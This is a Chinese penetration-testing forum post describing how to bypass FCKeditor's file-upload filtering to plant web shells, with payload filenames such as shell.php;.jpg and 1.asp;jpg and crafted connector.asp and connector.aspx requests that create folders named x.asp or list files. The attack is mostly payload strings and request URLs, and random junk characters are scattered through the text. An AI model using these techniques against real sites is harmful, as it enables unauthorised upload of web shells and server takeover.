中国网络渗透测试联盟

标题: FCK 0day FCKeditor 建立文件夹,上传文件时"."变"_"的突破 [打印本页]
作者: admin    时间: 2012-12-31 09:27
标题: FCK 0day FCKeditor 建立文件夹,上传文件时"."变"_"的突破
很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
, a% |5 D; `  o
  ~; U# R( T6 l3 N1 u7 G提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。9 |% a4 [2 c/ {
# b$ i: i1 Y% M& C# l
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
3 L4 K8 l- \6 @8 V0 d7 n6 m0 S, Z" ^* V# U" m
突破建立文件夹:) t7 H8 S6 Y3 \0 U

3 I7 n; Z+ T/ o+ h# Meditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
6 T- P* N% g, {* c1 d2 b8 O  {# M( }
参数:
& p! y3 K; Y. y5 o! Q+ ?) o2 U) F+ `
当前目录名:CurrentFolder=/qing.asp. m" |8 \$ m. C& Z

3 D/ ?0 M$ B# c新的目录名:NewFolderName=x.asp
$ T. q5 A; i3 s' j* J" w) q3 X+ L: }, u$ q; F7 @4 L9 m$ w
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……  ?8 ^$ b+ ^. ?! E2 G
$ U! ]6 b4 Q1 L' \! U2 @
那么 x.asp 就已经建立生成了,此方法百试百灵!
/ L, I7 L9 C, t! i, B0 l. v3 K: S  {& P" a8 |6 ]# q( @5 [
新建文件夹参数 x.asp,基本都能搞定。* G* G/ V9 t4 N# A

) B# ]1 a  w2 s5 g/ A( T下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
9 Z4 H$ U$ u/ X4 h& P& B* v; G& U
) \! }% {7 {% e$ x# qaspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp/ b: ~% Q) I5 h/ L0 b) i) S# t0 r: x3 r
: Q& G# ?* N/ o1 u: s7 ]& o
获取文件列表
5 i* [: P! z# o       aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F' f$ l6 e7 z# j5 _% K* Y$ O2 R

/ ^; D; T) N* R6 z- a  h



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2